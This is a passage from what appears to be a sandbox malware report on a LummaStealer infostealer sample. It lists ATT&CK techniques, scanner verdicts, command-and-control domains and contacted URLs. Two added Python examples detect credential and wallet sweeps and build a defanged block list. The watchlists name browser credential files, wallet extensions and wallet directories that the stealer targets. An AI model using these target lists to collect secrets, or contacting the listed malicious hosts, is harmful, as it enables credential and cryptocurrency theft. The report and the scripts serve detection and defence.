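The file-open and directory-query events above are the raw material for a host-side detection: a process that is not a browser opening Chromium and Firefox credential stores, wallet-extension storage, desktop wallet directories and FTP client profiles in a single sweep. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own signature logic. It builds its watchlists from the paths this report lists and runs them over a few constructed file-access events (process name, path) that mirror the ones above. The event schema, the benign process names chrome.exe and backup.exe, the allow-list of browser binaries and the scoring thresholds are assumptions; the extension IDs are copied from the report, which gives the IDs only, not the wallet names.

```python
"""Triage file-access events for infostealer-style credential and wallet sweeps.

Added example built from the paths in the report above; the event schema
(process name, path) and the sample events are constructed, not sandbox output.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Extension IDs observed under "Local Extension Settings" / "Sync Extension
# Settings" in the report (a subset; the report lists several dozen more).
WALLET_EXTENSION_IDS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn", "bfnaelmomeimhlpmgjnjophhpkkoljpa",
    "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad",
    "egjidjbpglichdcondbcbdnbeeppgdph", "aeachknmefphepccionboohckonoeemg",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bhghoamapcdpbohphigoooaddinpkbai",
    "hpglfhgfnhbgpjdenjgmdgoeiappafln", "jbdaocneiiinmjbjlgalhcelgbejmnid",
}
# Chromium profile files and Firefox profile files that hold credentials,
# cookies, history or the key material needed to decrypt them.
BROWSER_SECRET_FILES = {
    "login data", "login data for account", "cookies", "web data", "history",
    "logins.json", "key4.db", "cert9.db", "cookies.sqlite", "places.sqlite",
    "formhistory.sqlite", "prefs.js",
}
DESKTOP_WALLET_DIRS = (
    r"\exodus\exodus.wallet", r"\ledger live", r"\atomic\local storage\leveldb",
    r"\coinomi\coinomi\wallets", r"\bitcoin\wallets", r"\binance",
    r"\com.liberty.jaxx\indexeddb", r"\electrum\wallets",
    r"\electrum-ltc\wallets", r"\guarda\indexeddb",
)
FTP_CLIENT_DIRS = (
    r"\ftpbox", r"\smartftp\client 2.0\favorites", r"\ftpgetter", r"\ftpinfo",
    r"\sitedesigner\3d-ftp", r"\ftprush",
)
# Assumed allow-list: the browser reading its own profile is normal; any other
# process reading these stores is the signal.
BROWSER_OWNERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

EXT_SETTINGS_RE = re.compile(r"\\(?:local|sync) extension settings\\([a-p]+)")


def classify(path: str) -> Optional[str]:
    """Map one accessed path to a sensitivity category, or None if uninteresting."""
    p = path.lower()
    m = EXT_SETTINGS_RE.search(p)
    if m:
        return "wallet_extension" if m.group(1) in WALLET_EXTENSION_IDS else "other_extension"
    leaf = p.rsplit("\\", 1)[-1]
    if leaf in BROWSER_SECRET_FILES and ("\\user data\\" in p or "\\profiles\\" in p):
        return "browser_secret"
    if any(d in p for d in DESKTOP_WALLET_DIRS):
        return "desktop_wallet"
    if any(d in p for d in FTP_CLIENT_DIRS):
        return "ftp_client"
    return None


def triage(events: List[Tuple[str, str]]) -> Dict[str, dict]:
    """Count sensitive-path categories per process and flag stealer-like breadth."""
    hits: Dict[str, Counter] = {}
    for proc, path in events:
        cat = classify(path)
        if cat is None:
            continue
        proc = proc.lower()
        if cat == "browser_secret" and proc in BROWSER_OWNERS:
            continue
        hits.setdefault(proc, Counter())[cat] += 1
    verdicts = {}
    for proc, counts in hits.items():
        categories = {c for c in counts if c != "other_extension"}
        # Breadth is the discriminator (assumed thresholds): a stealer sweeps
        # browser secrets, wallet extensions, desktop wallets and FTP clients
        # in one run; a backup tool touches one category.
        suspicious = len(categories) >= 2 or counts["wallet_extension"] >= 3
        verdicts[proc] = {"counts": dict(counts), "suspicious": suspicious}
    return verdicts


# Constructed events mirroring paths from the report, plus two benign processes.
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
FIREFOX = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release"
SAMPLE_EVENTS = [
    ("biyhoksefdad.exe", CHROME + r"\Login Data"),
    ("biyhoksefdad.exe", CHROME + r"\Network\Cookies"),
    ("biyhoksefdad.exe", FIREFOX + r"\logins.json"),
    ("biyhoksefdad.exe", CHROME + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    ("biyhoksefdad.exe", CHROME + r"\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa"),
    ("biyhoksefdad.exe", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    ("biyhoksefdad.exe", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    ("biyhoksefdad.exe", r"C:\Users\user\AppData\Roaming\FTPRush"),
    ("biyhoksefdad.exe", r"C:\Users\user\Documents\EFOYFBOLXA"),
    ("chrome.exe", CHROME + r"\Login Data"),
    ("chrome.exe", CHROME + r"\Network\Cookies"),
    ("backup.exe", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
]

if __name__ == "__main__":
    for proc, verdict in triage(SAMPLE_EVENTS).items():
        print(proc, verdict)
```

On the sample events the sandboxed binary scores four categories and is flagged, chrome.exe produces no hits because it owns the profile, and backup.exe touching a single wallet directory stays below the threshold. In production the events would come from Sysmon Event ID 11 or an EDR file-access stream rather than a list literal, and the extension IDs should be resolved to wallet names against the Chrome Web Store before the watchlist is deployed.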

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR
Source: Yara match | File source: 0.2.biyhoksefdad.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK matrix (per tactic; a number in parentheses is the count of matched signatures, techniques without a number are unmatched matrix placeholders):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (12), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (31), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1), Software Packing, Steganography
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (321), Virtualization/Sandbox Evasion (31), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (21)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (14), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Antivirus detection, initial sample:
Source | Detection | Scanner | Label
biyhoksefdad.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
biyhoksefdad.exe | 61% | Virustotal |
biyhoksefdad.exe | 100% | Avira | HEUR/AGEN.1314134

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
Antivirus detection, URLs:
Source | Detection | Scanner | Label
https://univerxes.shop/SwnNW) | 0% | Avira URL Cloud | safe
https://univerxes.shop/g | 0% | Avira URL Cloud | safe
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_101925322770 | 0% | Avira URL Cloud | safe
https://catterjur.run/boSnzhus | 100% | Avira URL Cloud | malware
https://univerxes.shop/SwnNWceb | 0% | Avira URL Cloud | safe
https://univerxes.shop:443/SwnNWN | 0% | Avira URL Cloud | safe
https://univerxes.shop/SwnNWcCa | 0% | Avira URL Cloud | safe
https://arisechairedd.shop/ | 100% | Avira URL Cloud | malware
https://univerxes.shop/S | 0% | Avira URL Cloud | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | Avira URL Cloud | safe
https://garagedrootz.top/E1o | 100% | Avira URL Cloud | malware
https://univerxes.shop/ | 0% | Avira URL Cloud | safe
https://catterjur.run/) | 100% | Avira URL Cloud | malware
https://sterpickced.digital/z | 100% | Avira URL Cloud | malware
https://sterpickced.digital/v | 100% | Avira URL Cloud | malware
https://catterjur.run/ | 100% | Avira URL Cloud | malware
https://modelshiverd.icu/ | 100% | Avira URL Cloud | malware
https://univerxes.shop/? | 0% | Avira URL Cloud | safe
Name                 IP              Active   Malicious  Antivirus Detection  Reputation
univerxes.shop       172.67.213.171  true     true                            unknown
steamcommunity.com   104.73.234.102  true     false                           high
t.me                 149.154.167.99  true     false                           high
modelshiverd.icu     unknown         unknown  false                           high
garagedrootz.top     unknown         unknown  false                           high
fostinjec.today      unknown         unknown  false                           high
catterjur.run        unknown         unknown  false                           high
sterpickced.digital  unknown         unknown  false                           high
arisechairedd.shop   unknown         unknown  false                           high
orangemyther.live    unknown         unknown  false                           high
begindecafer.world   unknown         unknown  false                           high
Name                                                   Malicious  Antivirus Detection  Reputation
https://steamcommunity.com/profiles/76561199822375128  false                           high
https://t.me/kz_prokla2                                false                           high
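The three indicator tables above (scanner verdicts, resolved domains, contacted URLs) are what a responder turns into a block list, and the flattened text makes that error-prone: the Active and Malicious cells are fused ("truefalse", "unknownfalse") and the detection percentage is glued to the URL ("boSnzhus100%"). The Python parser below is an added example, not part of the Joe Sandbox report. Its sample input is copied from the tables above; the rule it uses to split the fused percentage off the URL is this example's own assumption, not something the report documents. It keeps the actor-controlled hosts apart from the legitimate services the sample also contacted (the report lists steamcommunity.com and t.me as active but not malicious) and emits the block list defanged.

```python
"""Parse the flattened indicator tables of a Joe Sandbox report into IOCs.

Added example, not part of the report. Sample input is copied from the
report's domain and URL tables; column meanings follow the page's headers
(Name, IP, Active, Malicious, Reputation; Source, Detection, Scanner, Label).
The digit-splitting rule in split_detection() is this example's assumption.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed input: four records from the report's domain table, in the
# four-lines-per-record layout the extraction produced (the empty
# "Antivirus Detection" column left no line at all).
DOMAIN_TABLE = """\
univerxes.shop
172.67.213.171
truetrue
unknown
steamcommunity.com
104.73.234.102
truefalse
high
t.me
149.154.167.99
truefalse
high
catterjur.run
unknown
unknownfalse
high
"""

# Constructed input: five rows from the report's Avira URL table, with the
# detection percentage fused to the end of the URL.
URL_TABLE = """\
https://univerxes.shop/SwnNW)0%Avira URL Cloudsafe
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_1019253227700%Avira URL Cloudsafe
https://catterjur.run/boSnzhus100%Avira URL Cloudmalware
https://arisechairedd.shop/100%Avira URL Cloudmalware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
"""


@dataclass
class DomainRecord:
    name: str
    ip: Optional[str]   # None where the report printed "unknown"
    active: str         # "true" / "false" / "unknown"
    malicious: str      # "true" / "false" / "unknown"
    reputation: str


@dataclass
class UrlVerdict:
    url: str
    detection: int      # 0..100
    scanner: str
    label: str          # "safe" / "malware"


FUSED_BOOL = re.compile(r"^(true|false|unknown)(true|false|unknown)$")
URL_ROW = re.compile(r"^(?P<body>.+)%(?P<scanner>Avira URL Cloud)(?P<label>safe|malware)$")


def parse_domain_table(text: str) -> List[DomainRecord]:
    """Group the flattened table into Name / IP / Active+Malicious / Reputation."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 4:
        raise ValueError("expected four lines per record")
    records = []
    for name, ip, fused, reputation in zip(*[iter(lines)] * 4):
        m = FUSED_BOOL.match(fused)
        if not m:
            raise ValueError(f"bad Active/Malicious cell for {name}: {fused!r}")
        records.append(DomainRecord(name, None if ip == "unknown" else ip,
                                    m.group(1), m.group(2), reputation))
    return records


def split_detection(body: str) -> Tuple[str, int]:
    """Split '<url><percent>' where the percent digits are glued to the URL.

    Assumption: a percent is '0', '1'..'99' without a leading zero, or '100',
    and the longest valid trailing candidate wins. Ambiguous when the URL
    itself ends in digits ('abc10'+'0' and 'abc'+'100' look identical), so
    such rows deserve a manual check against the scanner label.
    """
    run = re.search(r"\d+$", body)
    if not run:
        raise ValueError(f"no detection percent at end of {body!r}")
    digits = run.group(0)
    for k in (3, 2, 1):
        cand = digits[-k:]
        if len(cand) == k and (cand == "0" or re.fullmatch(r"[1-9]\d?|100", cand)):
            return body[:-k], int(cand)
    raise ValueError(f"no valid percent at end of {body!r}")


def parse_url_table(text: str) -> List[UrlVerdict]:
    verdicts = []
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        m = URL_ROW.match(line)
        if not m:
            raise ValueError(f"unrecognised URL row: {line!r}")
        url, pct = split_detection(m.group("body"))
        verdicts.append(UrlVerdict(url, pct, m.group("scanner"), m.group("label")))
    return verdicts


def build_blocklist(domains: List[DomainRecord], verdicts: List[UrlVerdict]) -> List[str]:
    """Actor infrastructure only: domains marked malicious plus hosts of URLs
    labelled malware. Contacted-but-not-malicious domains (steamcommunity.com,
    t.me here) stay out; blocking them would break legitimate services."""
    hosts = {d.name for d in domains if d.malicious == "true"}
    hosts |= {urlparse(v.url).hostname for v in verdicts if v.label == "malware"}
    return sorted(h for h in hosts if h)


def defang(s: str) -> str:
    return s.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


def defanged_blocklist() -> List[str]:
    return [defang(h) for h in build_blocklist(parse_domain_table(DOMAIN_TABLE),
                                                parse_url_table(URL_TABLE))]


if __name__ == "__main__":
    for v in parse_url_table(URL_TABLE):
        print(f"{v.detection:3d}% {v.label:8s} {defang(v.url)}")
    print("block:", ", ".join(defanged_blocklist()))
```

Feeding the full tables from the report through this yields three actor hosts from the sample shown here (arisechairedd.shop, catterjur.run, univerxes.shop); catterjur.run is added by the URL verdict even though the domain table itself lists it as not malicious, which is why both tables have to be read together.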
Name / Source / Malicious / Antivirus Detection / Reputation

https://player.vimeo.com
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://duckduckgo.com/ac/?q=
  Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_101925322770
  Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://steamcommunity.com/?subsection=broadcasts
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
  Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop/SwnNW)
  Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
  Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://store.steampowered.com/subscriber_agreement/
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://www.gstatic.cn/recaptcha/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://modelshiverd.icu/bJhnsj
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://arisechairedd.shop/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

http://www.valvesoftware.com/legal.htm
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
  Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://www.youtube.com
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
  Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://www.google.com
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
  Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop/g
  Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop/SwnNWcCa
  Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://duckduckgo.com/chrome_newtabv209h
  Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=3Cj4p8f8gr
  Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://s.ytimg.com;
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
  Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://steam.tv/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop/S
  Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop/SwnNWceb
  Source: biyhoksefdad.exe, 00000000.00000003.1443109110.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1446558191.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

http://store.steampowered.com/privacy_agreement/
  Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://store.steampowered.com/points/shop/
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

http://crl.rootca1.amazontrust.com/rootca1.crl0
  Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

http://ocsp.rootca1.amazontrust.com0:
  Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://sketchfab.com
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://lv.queniujq.cn
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
  Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://www.youtube.com/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://store.steampowered.com/privacy_agreement/
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

